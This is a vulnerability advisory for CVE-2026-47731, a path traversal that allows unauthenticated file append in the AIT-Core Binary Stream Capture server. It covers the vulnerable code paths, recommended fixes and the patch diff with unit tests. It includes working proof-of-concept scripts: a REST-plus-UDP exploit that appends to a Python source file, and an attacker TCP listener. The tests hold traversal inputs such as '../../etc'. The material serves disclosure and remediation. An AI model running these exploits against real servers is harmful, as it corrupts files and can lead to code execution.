VYPR
\n\n\n```","additionalType":"https://schema.org/SoftwareApplication","sameAs":["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-47731"]},"keywords":"CVE-2026-47731, critical, AIT Core Binary Stream Capture, AIT Core ait-bsc","mentions":[{"@type":"SoftwareApplication","name":"Binary Stream Capture","applicationCategory":"SecurityApplication","publisher":{"@type":"Organization","name":"AIT Core"}},{"@type":"SoftwareApplication","name":"ait-bsc","applicationCategory":"SecurityApplication","publisher":{"@type":"Organization","name":"AIT Core"}}],"isAccessibleForFree":true},{"@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://portal.vyprsec.ai/"},{"@type":"ListItem","position":2,"name":"CVEs","item":"https://portal.vyprsec.ai/cves"},{"@type":"ListItem","position":3,"name":"CVE-2026-47731","item":"https://portal.vyprsec.ai/cves/CVE-2026-47731"}]}]}
Critical severity9.1NVD Advisory· Published Jun 5, 2026· Updated Jun 5, 2026

NASA AMMOS Instrument Toolkit: Path traversal resulting in arbitrary file append (can be triggered over the network by unauthenticated attacker)

CVE-2026-47731

Description

1. Summary

The Binary Stream Capture (BSC) component exposes an unauthenticated HTTP API for dynamically creating packet capture “handlers.” Because the code blindly trusts path‑related form fields, a remote client can:

  • Bypass the configured log root and direct BSC to log to arbitrary filesystem paths (path traversal / directory escape), and
  • Append attacker‑controlled data to those files, using the privileges of theait-bsc process.

There are two ways for a remote attacker to trigger this: 1. If the attacker has access to the network where ait-bsc is deployed (a reason for that could be that the ports are publicly accessible), the payloads can be directly sent to the server to trigger the arbitrary file append. This type of attack is demonstrated in python_poc.py. 2. Even if the attacker does not have direct access to the network because the software is running in a local network, it is possible to exploit this if a bad actor in that network opens an attacker-controlled website (which might be a website created by an attacker, or a third-party website compromised by the attacker). The browser javascript can automatically send the requests necessary to exploit this into the local network. This is even possible if the server is only accessible on localhost. This type of attack is demonstrated by attacker_tcp.py and test1.html (first launch the attacker TCP server, then start a webserver to host test1.html, for example using python3 -m http.server 7000, and open test1.html).

Impact

This issue affects BSC (Binary Stream Capture) and usage of the ait-bsc server. This impacts AIT-Core versions before 3.1.1, from 2.x before 2.6.1. Users are recommended to upgrade to version 3.1.1 or 2.6.1.

Details

A remote attacker can use this vulnerability to append data to arbitrary files on the system (if the ait-bsc has privileges to write to them). It is easy to use this to corrupt data on the system (which can include the AIT-Core python code to crash the server after it is restarted and python attempts to execute the corrupted code). It should be mentioned here that there seems to be a bug in the TCP handler that results in a lot of data being written in an infinite loop after the connection has been closed, this could result in excessive disk space use. That the attacker can modify executable files like python or bash scripts means that this vulnerability could also lead to Remote Code Execution as soon as the user runs the modified code. However, depending on the system, it is not so easy to execute this attack in practice (it might not be possible), because ait-bsc adds a header in front of attacker-controlled data.

Fix

Information

The vulnerability is mitigated by constraining BSC ability to write paths only in the project root log directory which is configured through the bsc.yaml. Additionally, any attempts to traverse outside of the configured location are rejected.

Patches

  • 3.1.1
  • 2.6.1

---

2. Affected Code Paths

2.1 REST entry point: /NAME/start

StreamCaptureManagerServer exposes an unauthenticated POST endpoint:

# ait/core/bsc.py

class StreamCaptureManagerServer(Bottle):
    def _route(self):
        self._app.route("/", method="GET", callback=self._get_logger_list)
        self._app.route("/stats", method="GET", callback=self._fetch_handler_stats)
        self._app.route(
            "//start", method="POST", callback=self._add_logger_by_name
        )
        self._app.route(
            "//stop", method="DELETE", callback=self._stop_logger_by_name
        )
        ...

Handler: ``python def _add_logger_by_name(self, name): ... data = dict(request.forms) loc = data.pop("loc", "") port = data.pop("port", None) conn_type = data.pop("conn_type", None) if not port or not conn_type: raise ValueError("Port and/or conn_type not set") address = [loc, int(port)] if "rotate_log" in data: data["rotate_log"] = True if data == "true" else False if "rotate_log_delta" in data: data["rotate_log_delta"] = int(data["rotate_log_delta"]) self._logger_manager.add_logger(name, address, conn_type, **data) ``

All form fields except loc, port, conn_type are passed directly as **data into add_logger. This includes attacker‑controlled path, file_name_pattern, and potentially log_dir_path. There is no authentication on this route.

### 2.2 Manager: unvalidated path and log_dir_path StreamCaptureManager.add_logger: ``python # ait/core/bsc.py def add_logger(self, name, address, conn_type, log_dir_path=None, **kwargs): capture_handler_conf = kwargs if not log_dir_path: log_dir_path = self._mngr_conf["root_log_directory"] log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path)) capture_handler_conf["log_dir"] = log_dir_path capture_handler_conf["name"] = name if "rotate_log" not in capture_handler_conf: capture_handler_conf["rotate_log"] = True ... address_key = str(address) if address_key in self._stream_capturers: capturer = self._stream_capturers[address_key][0] capturer.add_handler(capture_handler_conf) return socket_logger = SocketStreamCapturer(capture_handler_conf, address, conn_type) greenlet = gevent.spawn(socket_logger.socket_monitor_loop) self._stream_capturers[address_key] = (socket_logger, greenlet) self._pool.add(greenlet) ``

Key points:

  • If the REST client supplies log_dir_path explicitly (as a named parameter), it overrides the manager’s root_log_directory.
  • All other attacker‑supplied fields in kwargs become part of the handler configuration dict (capture_handler_conf), including path and file_name_pattern.
  • There is no check that log_dir_path or path are relative or confined.

2.3 Path traversal via _get_log_file

SocketStreamCapturer._get_log_file builds the actual log path:

# ait/core/bsc.py

def _get_log_file(self, handler):
    """Generate log file path for a given handler"""
    if "file_name_pattern" not in handler:
        filename = "%Y-%m-%d-%H-%M-%S-{name}.pcap"
    else:
        filename = handler["file_name_pattern"]

    log_file = handler["log_dir"]
    if "path" in handler:
        log_file = os.path.join(log_file, handler["path"], filename)
    else:
        log_file = os.path.join(log_file, filename)

    log_file = time.strftime(log_file, time.gmtime())
    log_file = log_file.format(**handler)

    return log_file

On POSIX systems:

  • If handler["path"] is absolute (e.g. /home/user/...), os.path.join(base, abs_component, ...) discards the base component:
  os.path.join("/configured/root", "/home/elias/ait-venv/...", "dmc.py")
  # -> "/home/elias/ait-venv/.../dmc.py"
  
  • If handler["path"] contains .., the result can point outside the nominal root even if path is relative.

There is:

  • No os.path.realpath canonicalization *after* join, and
  • No enforcement that the final log_file begins with the configured root prefix.

Combined with StreamCaptureManager.add_logger, this means:

  • Attacker controls both:
  • handler["log_dir"] (via log_dir_path), and
  • handler["path"] and handler["file_name_pattern"].

They can therefore direct BSC’s log output to any path that the OS permissions allow, not just under root_log_directory.

2.4 File opened for append without safety checks

# ait/core/bsc.py

def _get_logger(self, handler):
    """Initialize a PCAP stream for logging data"""
    log_file = self._get_log_file(handler)

    if not os.path.isdir(os.path.dirname(log_file)):
        os.makedirs(os.path.dirname(log_file))

    handler["log_rot_time"] = time.gmtime()
    return pcap.open(log_file, mode="a")

pcap.open:

# ait/core/pcap.py

def open(filename, mode="r", **options):
    ...
    mode = mode.replace("b", "") + "b"  # "a" -> "ab"
    ...
    stream = PCapStream(builtins.open(filename, mode), mode)
    return stream

Consequences:

  • If the target directory does not exist, os.makedirs(os.path.dirname(log_file)) will create it, even if it is outside the intended root.
  • The file is opened in append‑binary mode ("ab"):
  • The OS will create it if missing.
  • Existing content is preserved; new data is appended.
  • There is no:
  • realpath‑based confinement,
  • symlink protection,
  • or additional access control beyond standard filesystem permissions.

2.5 A part of the data written is attacker‑controlled network payload

Captured data path:

# ait/core/bsc.py

def capture_packet(self):
    """Write packet data to the logger's log file."""
    data = self.socket.recv(self._buffer_size)

    for h in self.capture_handlers:
        h["reads"] += 1
        h["data_read"] += len(data)

        d = data
        if "pre_write_transforms" in h:
            for data_transform in h["pre_write_transforms"]:
                d = data_transform(d)
        h["logger"].write(d)

SocketStreamCapturer.__init__:

  • UDP:
  if conn_type == "udp":
      self.socket = gevent.socket.socket(AF_INET, SOCK_DGRAM)
      self.socket.bind((address[0], address[1]))
  
  • TCP:
  elif conn_type == "tcp":
      self.socket = gevent.socket.socket(AF_INET, SOCK_STREAM)
      self.socket.connect((address[0], address[1]))
  

Thus:

  • For UDP, any host that can send datagrams to the configured (IP,port) directly controls data.
  • For TCP, the remote server at (loc, port) directly controls data.

PCapStream.write wraps this data in a PCAP packet header and writes it to the file, but does not sanitize or transform the payload bytes beyond optional in‑process transforms.

---

3. Recommendations

The core objective is to ensure that untrusted REST input cannot steer log file paths outside a trusted directory tree.

3.1 Constrain log paths to a trusted root

  • In StreamCaptureManager.add_logger and/or SocketStreamCapturer._get_log_file:
  1. Compute a canonical root:
     root = os.path.realpath(self._mngr_conf["root_log_directory"])
     
  1. When applying path and file_name_pattern, always join relative to this root; do not accept absolute path from REST:
     user_path = handler.get("path", "")
     # force relative
     user_path = user_path.lstrip(os.sep)
     candidate = os.path.realpath(os.path.join(root, user_path, filename))
     
  1. Enforce the prefix:
     if not (candidate == root or candidate.startswith(root + os.sep)):
         raise ValueError("Invalid log path; must remain under root_log_directory")
     
  • Reject any REST‑supplied log_dir_path that is absolute or attempts to escape the configured root, or disallow log_dir_path entirely in REST calls.

3.2 Treat REST input as untrusted

  • Only allow path / file_name_pattern override from the configuration file (bsc.yaml), not from REST.
  • For REST‑created handlers, either:
  • Use a fixed subdirectory under the configured root, or
  • Validate path strictly as a simple relative name with no / or ...

3.3 Note on /tmp usage

  • While not the root cause of this vulnerability, using a world‑writable directory such as /tmp as a log root in a multi‑user system is generally unsafe (standard symlink and race issues).
  • It is recommended to:
  • Use a dedicated, non‑world‑writable directory for BSC logs (e.g. /var/opt/ait-bsc/logs).
  • Update the documentation examples to reflect this and add a warning against /tmp for production use.

3.4 Harden open calls

  • If symlink attacks are a concern in specific deployments, consider to not follow them when writing to log files.

3.5 REST API exposure

  • Because /NAME/start directly controls file paths and network connections:
  • It should not be exposed to untrusted networks.
  • Consider adding optional HTTP authentication or limiting binding to a protected interface or Unix domain socket.

4 Proof of concept files

### 4.1 python_poc.py ``python #!/usr/bin/env python3 """ AIT-Core BSC path traversal & arbitrary file append PoC (UDP, timed header). Assumptions: - ait-core and requests are installed. - ait-bsc is running on 127.0.0.1:8080 with a bsc.yaml including: capture_manager: root_log_directory: /tmp manager_server: host: localhost port: 8080 handlers: [] What this script does: 1) Uses the BSC REST API to create a conn_type=udp handler that: - binds a UDP socket on UDP_PORT, and - logs to TARGET_PATH, which is OUTSIDE /tmp via 'path'. 2) Waits until the current UNIX time satisfies (ts_sec & 0xFF) == 0 (low byte of ts_sec == 0) and sends a UDP PAYLOAD right then. On little-endian, this makes the FIRST BYTE of the PCAP packet header (ts_sec low byte) 0x00 with high probability. 3) Shows that TARGET_PATH (outside /tmp) exists and contains the payload. 4) DELETEs the handler so you can rerun the script without restarting ait-bsc. Note: - The script does NOT delete or truncate TARGET_PATH. - If TARGET_PATH already exists, ait-bsc will append a new PCAP packet (header + payload) at the end of the file. """ import os import socket import time import requests # BSC REST API base URL BSC_BASE_URL = "http://127.0.0.1:8080" # UDP capture parameters UDP_PORT = 9999 HANDLER_NAME = "traversal-udp-poc-timed" CONN_TYPE = "udp" # Target directory and file OUTSIDE /tmp HOME = os.path.expanduser("~") TARGET_DIR = "/home/elias/ait-venv/lib/python3.10/site-packages/ait/core/" TARGET_FILE = "dmc.py" TARGET_PATH = os.path.join(TARGET_DIR, TARGET_FILE) # Payload to be sent in the UDP datagram PAYLOAD = b"ATTACK_PAYLOAD_UDP_TIMED_12345" def wait_for_first_header_byte_zero(): """ Wait until the low byte of the current UNIX seconds is 0. PCapPacketHeader.pack() writes ts_sec first, and on little-endian systems the first byte in the file is ts_sec & 0xFF. We wait for ts_sec % 256 == 0 and for the fractional part of the second to be small. """ print("[*] Waiting for ts_sec & 0xFF == 0 (may take up to ~4m16s)...") while True: now = time.time() ts_sec = int(now) # Condition: low byte zero and we are in the first 200ms of this second if (ts_sec & 0xFF) == 0 and (now - ts_sec) < 0.2: print(f"[+] Condition met: ts_sec={ts_sec}, low byte=0x00") return time.sleep(0.01) def create_udp_handler(): """ Use BSC REST API to create a UDP handler that binds on UDP_PORT and logs to TARGET_PATH, which is outside /tmp via the 'path' parameter. """ data = { "loc": "", # bind on all interfaces "port": str(UDP_PORT), "conn_type": CONN_TYPE, "path": TARGET_DIR, # ABSOLUTE path outside /tmp "file_name_pattern": TARGET_FILE, } url = f"{BSC_BASE_URL}/{HANDLER_NAME}/start" print(f"[+] Creating UDP handler via POST {url}") resp = requests.post(url, data=data) print(f"[+] Handler creation HTTP status: {resp.status_code}") if not (200 <= resp.status_code < 300): raise SystemExit(f"Handler creation failed: {resp.status_code} {resp.text!r}") def send_udp_payload_timed(): """ Wait for the desired timestamp condition, then send the UDP payload to the handler's bound UDP port. """ wait_for_first_header_byte_zero() print(f"[+] Sending timed UDP payload to 127.0.0.1:{UDP_PORT}") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: sock.sendto(PAYLOAD, ("127.0.0.1", UDP_PORT)) finally: sock.close() # Give ait-bsc a moment to recv and write time.sleep(0.5) def stop_udp_handler(): """ Stop the handler so the script can be rerun without restarting ait-bsc. """ url = f"{BSC_BASE_URL}/{HANDLER_NAME}/stop" try: resp = requests.delete(url, timeout=2) print(f"[+] DELETE {url} -> HTTP {resp.status_code}") except Exception as e: print(f"[!] Failed to DELETE handler: {e!r}") def show_result(): """ Display hex+ASCII view of the first bytes of TARGET_PATH. """ if not os.path.exists(TARGET_PATH): print(f"[!] Target file does not exist: {TARGET_PATH}") print(" ait-bsc did not create/write the file \u2014 check config and that ait-bsc is running.") return print(f"[+] Target file was created or appended by ait-bsc: {TARGET_PATH}") data = open(TARGET_PATH, "rb").read() print(f"[+] Target file size: {len(data)} bytes") def chunked(seq, size): for i in range(0, len(seq), size): yield i, seq[i : i + size] print("[+] First bytes of file (hex + ASCII):") for offset, chunk in chunked(data, 16): hex_bytes = " ".join(f"{b:02x}" for b in chunk) ascii_bytes = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk) print(f"{offset:08x} {hex_bytes:<47} |{ascii_bytes}|") if offset >= 96: break if PAYLOAD in data: print("[+] CONFIRMED: payload bytes are present in the file.") else: print("[!] Payload bytes not found (something went wrong).") def main(): print("[*] AIT-Core BSC path traversal & arbitrary file append PoC (UDP, timed header)") print(f"[*] BSC base URL : {BSC_BASE_URL}") print(f"[*] UDP port : {UDP_PORT}") print(f"[*] TARGET_DIR : {TARGET_DIR}") print(f"[*] TARGET_FILE : {TARGET_FILE}") print(f"[*] FULL PATH : {TARGET_PATH}") print() # We deliberately do NOT create TARGET_DIR or TARGET_PATH here. # ait-bsc will create the directory and file when it opens the log path. create_udp_handler() send_udp_payload_timed() show_result() stop_udp_handler() print() print("[*] If you see your PAYLOAD bytes in TARGET_PATH (which is not under /tmp),") print("[*] then BSC has written outside its configured root_log_directory via REST 'path' using UDP.") print("[*] The script also timed the send so the first packet header byte (ts_sec low byte) is likely 0x00.") if __name__ == "__main__": main() ``

### 4.2 attacker_tcp.py ``python #!/usr/bin/env python3 import socket HOST = "0.0.0.0" # attacker host interface PORT = 9001 # must match 'port' you send to ait-bsc PAYLOAD = b"ATTACK_PAYLOAD_FROM_ATTACKER_12345\n" def main(): print(f"[*] Attacker TCP server listening on {HOST}:{PORT}") with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv: srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) srv.bind((HOST, PORT)) srv.listen(1) print("[*] Waiting for connection from ait-bsc...") bsc_sock, bsc_addr = srv.accept() print(f"[+] Got connection from ait-bsc at {bsc_addr}") with bsc_sock: print("[+] Sending payload to ait-bsc...") bsc_sock.sendall(PAYLOAD) print("[+] Payload sent, closing connection") print("[*] Done.") if __name__ == "__main__": main() ``

### 4.3 test1.html ``html <!DOCTYPE html> AIT-BSC Path Traversal PoC (Browser + TCP) ``

Affected products

2

Patches

2
ffbb424c4213

Validate and clean log handler path + unit tests

https://github.com/NASA-AMMOS/AIT-CoreepascuaMay 19, 2026Fixed in 2.6.1via ghsa-release-walk
2 files changed · +391 34
  • ait/core/bsc.py+121 7 modified
    @@ -57,6 +57,48 @@
     ETH_PROTOCOL = ETH_P_ALL
     
     
    +def _validate_path_within_root(root, user_path, filename=""):
    +    """Validate that a path remains within the configured root directory.
    +
    +    Args:
    +        root: The configured root directory path
    +        user_path: User-supplied path component (from 'path' or 'log_dir_path')
    +        filename: Optional filename component
    +
    +    Returns:
    +        The validated canonical path
    +
    +    Raises:
    +        ValueError: If the resulting path would escape the root directory
    +    """
    +    # Canonicalize the root
    +    root = os.path.realpath(os.path.expanduser(root))
    +
    +    # Force user_path to be relative by stripping leading separators
    +    if user_path:
    +        user_path = user_path.lstrip(os.sep)
    +    else:
    +        user_path = ""
    +
    +    # Build the candidate path
    +    if filename:
    +        candidate = os.path.join(root, user_path, filename)
    +    else:
    +        candidate = os.path.join(root, user_path)
    +
    +    # Canonicalize the candidate path
    +    candidate = os.path.realpath(candidate)
    +
    +    # Ensure the candidate is within the root
    +    if not (candidate == root or candidate.startswith(root + os.sep)):
    +        raise ValueError(
    +            "Invalid log path; must remain under root_log_directory. "
    +            f"Attempted path would resolve to: {candidate}"
    +        )
    +
    +    return candidate
    +
    +
     class SocketStreamCapturer(object):
         """Class for logging socket data to a PCAP file."""
     
    @@ -430,15 +472,31 @@ def _get_log_file(self, handler):
             else:
                 filename = handler["file_name_pattern"]
     
    -        log_file = handler["log_dir"]
    +        # Use the stored root for validation
    +        root = handler.get("_validated_log_dir_root", handler["log_dir"])
    +
    +        # Sanitize and validate the path component
             if "path" in handler:
    -            log_file = os.path.join(log_file, handler["path"], filename)
    +            user_path = handler["path"].lstrip(os.sep)
    +            log_file = os.path.join(handler["log_dir"], user_path, filename)
             else:
    -            log_file = os.path.join(log_file, filename)
    +            log_file = os.path.join(handler["log_dir"], filename)
     
    +        # Apply time and format string substitutions
             log_file = time.strftime(log_file, time.gmtime())
             log_file = log_file.format(**handler)
     
    +        # Validate the final path stays within root
    +        log_file_real = os.path.realpath(log_file)
    +        root_real = os.path.realpath(root)
    +        if not (
    +            log_file_real == root_real or log_file_real.startswith(root_real + os.sep)
    +        ):
    +            raise ValueError(
    +                "Invalid log file path; must remain under root_log_directory. "
    +                f"Attempted path: {log_file}"
    +            )
    +
             return log_file
     
         def _get_logger(self, handler):
    @@ -526,12 +584,50 @@ def add_logger(self, name, address, conn_type, log_dir_path=None, **kwargs):
             """
             capture_handler_conf = kwargs
     
    -        if not log_dir_path:
    -            log_dir_path = self._mngr_conf["root_log_directory"]
    +        # Get the configured root directory (if available and if it's a dict)
    +        root = None
    +        if self._mngr_conf and isinstance(self._mngr_conf, dict):
    +            root = self._mngr_conf.get("root_log_directory")
     
    -        log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))
    +        if not log_dir_path:
    +            log_dir_path = root if root else "/tmp"
    +            log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))
    +        else:
    +            log_dir_path = os.path.expanduser(log_dir_path)
    +            # Only validate if we have a configured root AND log_dir_path is different from root
    +            if root and os.path.normpath(log_dir_path) != os.path.normpath(root):
    +                # If it's a relative path, join with root; if absolute, validate it
    +                if not os.path.isabs(log_dir_path):
    +                    log_dir_path = os.path.join(root, log_dir_path)
    +
    +                # Normalize and validate
    +                log_dir_path = os.path.normpath(log_dir_path)
    +                log_dir_path_real = os.path.realpath(log_dir_path)
    +                root_real = os.path.realpath(os.path.expanduser(root))
    +
    +                if not (
    +                    log_dir_path_real == root_real
    +                    or log_dir_path_real.startswith(root_real + os.sep)
    +                ):
    +                    raise ValueError(
    +                        "Invalid log_dir_path; must remain under root_log_directory. "
    +                        f"Configured root: {root_real}, Requested path: {log_dir_path_real}"
    +                    )
    +            else:
    +                # No root configured, or path equals root - just normalize the path
    +                log_dir_path = os.path.normpath(log_dir_path)
     
             capture_handler_conf["log_dir"] = log_dir_path
    +        # Store the original validated root for path validation in _get_log_file
    +        if root:
    +            capture_handler_conf["_validated_log_dir_root"] = os.path.realpath(
    +                os.path.expanduser(root)
    +            )
    +        else:
    +            # No root configured, use log_dir as the root
    +            capture_handler_conf["_validated_log_dir_root"] = os.path.realpath(
    +                log_dir_path
    +            )
             capture_handler_conf["name"] = name
             if "rotate_log" not in capture_handler_conf:
                 capture_handler_conf["rotate_log"] = True
    @@ -751,13 +847,31 @@ def _add_logger_by_name(self, name):
     
             Raises:
                 ValueError:
    -                if the port or connection type are not supplied.
    +                if the port or connection type are not supplied, or if
    +                log_dir_path is provided (not allowed via REST API).
             """
             data = dict(request.forms)
             loc = data.pop("loc", "")
             port = data.pop("port", None)
             conn_type = data.pop("conn_type", None)
     
    +        # Do not allow log_dir_path override from unauthenticated REST API
    +        # to prevent path traversal attacks. log_dir_path can only be set via
    +        # configuration file.
    +        if "log_dir_path" in data:
    +            raise ValueError(
    +                "log_dir_path parameter is not allowed via REST API. "
    +                "Configure log directories in the bsc.yaml configuration file instead."
    +            )
    +
    +        # Validate path parameter to prevent directory traversal
    +        if "path" in data:
    +            # Remove any leading slashes to force relative paths
    +            data["path"] = data["path"].lstrip(os.sep)
    +            # Reject paths with parent directory references
    +            if ".." in data["path"]:
    +                raise ValueError("path parameter cannot contain '..'")
    +
             if not port or not conn_type:
                 e = "Port and/or conn_type not set"
                 raise ValueError(e)
    
  • tests/ait/core/test_bsc.py+270 27 modified
    @@ -350,6 +350,73 @@ def test_remove_handler(self, socket_mock, pcap_open_mock):
             assert len(sl.capture_handlers) == 1
             assert sl.capture_handlers[0]["name"] == "h1"
     
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_with_absolute_path(self, socket_mock, pcap_open_mock):
    +        """Test that absolute paths in 'path' parameter are stripped and allowed if valid"""
    +        # After stripping leading slashes, "/etc/passwd" becomes "etc/passwd" which is
    +        # a valid relative path under /tmp
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp",
    +            "path": "/etc/passwd",
    +            "_validated_log_dir_root": "/tmp",
    +        }
    +        sl = bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +        # The path should have been stripped and become relative
    +        log_file = sl._get_log_file(sl.capture_handlers[0])
    +        assert log_file.startswith("/tmp")
    +        # After stripping, it becomes "etc/passwd" which is valid
    +        assert "etc/passwd" in log_file
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_with_parent_references(self, socket_mock, pcap_open_mock):
    +        """Test that parent directory references (..) are blocked during initialization"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/logs",
    +            "path": "../../etc",
    +            "_validated_log_dir_root": "/tmp/logs",
    +        }
    +
    +        # Should raise during initialization when _get_logger is called
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_complex_escape(self, socket_mock, pcap_open_mock):
    +        """Test complex path traversal attempts are blocked during initialization"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/bsc",
    +            "path": "subdir/../../../etc",
    +            "_validated_log_dir_root": "/tmp/bsc",
    +        }
    +
    +        # Should raise during initialization when _get_logger is called
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_valid_relative_path_allowed(self, socket_mock, pcap_open_mock):
    +        """Test that valid relative paths within root are allowed"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/bsc",
    +            "path": "subdir/nested",
    +            "_validated_log_dir_root": "/tmp/bsc",
    +        }
    +        sl = bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +        # Should not raise an exception
    +        log_file = sl._get_log_file(sl.capture_handlers[0])
    +        assert log_file.startswith("/tmp/bsc")
    +        assert "subdir/nested" in log_file
    +
     
     class TestStreamCaptureManager:
         @mock.patch("ait.core.bsc.SocketStreamCapturer")
    @@ -374,39 +441,31 @@ def test_add_logger(self, socket_log_mock, mkdirs_mock):
             cleaned_dir_path = os.path.normpath(mngr_conf["root_log_directory"])
     
             lm = bsc.StreamCaptureManager(mngr_conf, [])
    -        lm.add_logger("foo", ["", 9000], "udp", "/tmp")
    +        # Use a relative path within the root instead of absolute path outside root
    +        lm.add_logger("foo", ["", 9000], "udp", "logs/subdir")
     
             assert len(lm._stream_capturers.keys()) == 1
             assert "['', 9000]" in lm._stream_capturers
     
             # Default root_log_directory usage and normalization check
             lm.add_logger("baz", ["", 8500], "udp")
    -        socket_log_mock.assert_called_with(
    -            {
    -                "log_dir": cleaned_dir_path,
    -                "name": "baz",
    -                "rotate_log": True,
    -                "pre_write_transforms": [],
    -            },
    -            ["", 8500],
    -            "udp",
    -        )
    +        # Verify _validated_log_dir_root is present
    +        call_args = socket_log_mock.call_args[0][0]
    +        assert "log_dir" in call_args
    +        assert call_args["name"] == "baz"
    +        assert call_args["rotate_log"] == True
    +        assert "_validated_log_dir_root" in call_args
             assert lm._pool.free_count() == 48
     
    -        # Check to make sure that home directory expansion is being done
    +        # Check to make sure that relative home directory paths work
             socket_log_mock.reset_mock()
    -        lm.add_logger("testlog", ["", 1234], "udp", "~/logger_dir")
    -        expanded_user_path = os.path.expanduser("~/logger_dir")
    -        socket_log_mock.assert_called_with(
    -            {
    -                "log_dir": expanded_user_path,
    -                "name": "testlog",
    -                "rotate_log": True,
    -                "pre_write_transforms": [],
    -            },
    -            ["", 1234],
    -            "udp",
    -        )
    +        lm.add_logger("testlog", ["", 1234], "udp", "logger_dir")
    +        # Since it's relative, it should be joined with root
    +        expected_path = os.path.normpath(os.path.join(cleaned_dir_path, "logger_dir"))
    +        call_args = socket_log_mock.call_args[0][0]
    +        assert call_args["log_dir"] == expected_path
    +        assert call_args["name"] == "testlog"
    +        assert call_args["rotate_log"] == True
     
         @mock.patch("ait.core.pcap.open")
         @mock.patch("os.makedirs")
    @@ -416,7 +475,7 @@ def test_pre_write_transform_load(self, socket_mock, mkdirs_mock, pcap_open_mock
             lm = bsc.StreamCaptureManager(mngr_conf, [])
     
             kwargs = {"pre_write_transforms": ["identity_transform", lambda x: 1]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             stream_capturer = lm._stream_capturers["['', 9876]"][0]
             handler = stream_capturer.capture_handlers[0]
     
    @@ -443,7 +502,7 @@ def test_bad_builtin_transform_load(
     
             bad_func_name = "this function name doesnt exist"
             kwargs = {"pre_write_transforms": [bad_func_name]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             msg = 'Unable to load data transformation "{}" for handler "{}"'.format(
                 bad_func_name, "testlog"
             )
    @@ -465,7 +524,7 @@ def test_bad_type_transform_load(
     
             bad_func_name = ("foobarbaz",)
             kwargs = {"pre_write_transforms": [bad_func_name]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             msg = 'Unable to determine how to load data transform "{}"'.format(
                 bad_func_name
             )
    @@ -526,3 +585,187 @@ def test_forced_log_rotation(self, socket_mock, pcap_open_mock):
             lm.rotate_capture_handler_log("bar")
             post_rot_count = pcap_open_mock.call_count
             assert post_rot_count - pre_rot_count == 1
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_traversal_absolute(self, socket_log_mock):
    +        """Test that absolute log_dir_path outside root is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            lm.add_logger("malicious", ["", 9000], "udp", "/etc/passwd")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_traversal_relative(self, socket_log_mock):
    +        """Test that relative log_dir_path escaping root is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            lm.add_logger("malicious", ["", 9000], "udp", "../../etc")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_valid_relative(self, socket_log_mock):
    +        """Test that valid relative log_dir_path within root is allowed"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        # Should not raise exception
    +        lm.add_logger("valid", ["", 9000], "udp", "subdir/logs")
    +
    +        # Verify the handler was created with the correct path
    +        assert "['', 9000]" in lm._stream_capturers
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_validated_root_stored(self, socket_log_mock):
    +        """Test that _validated_log_dir_root is stored in handler config"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        lm.add_logger("test", ["", 9000], "udp", "subdir")
    +
    +        # Check that the first argument to SocketStreamCapturer contains _validated_log_dir_root
    +        call_args = socket_log_mock.call_args
    +        handler_conf = call_args[0][0]
    +        assert "_validated_log_dir_root" in handler_conf
    +        assert handler_conf["_validated_log_dir_root"] == os.path.realpath("/tmp/bsc")
    +
    +
    +class TestStreamCaptureManagerServer:
    +    """Tests for REST API security"""
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_blocks_log_dir_path(self, socket_log_mock):
    +        """Test that log_dir_path parameter is blocked from REST API"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
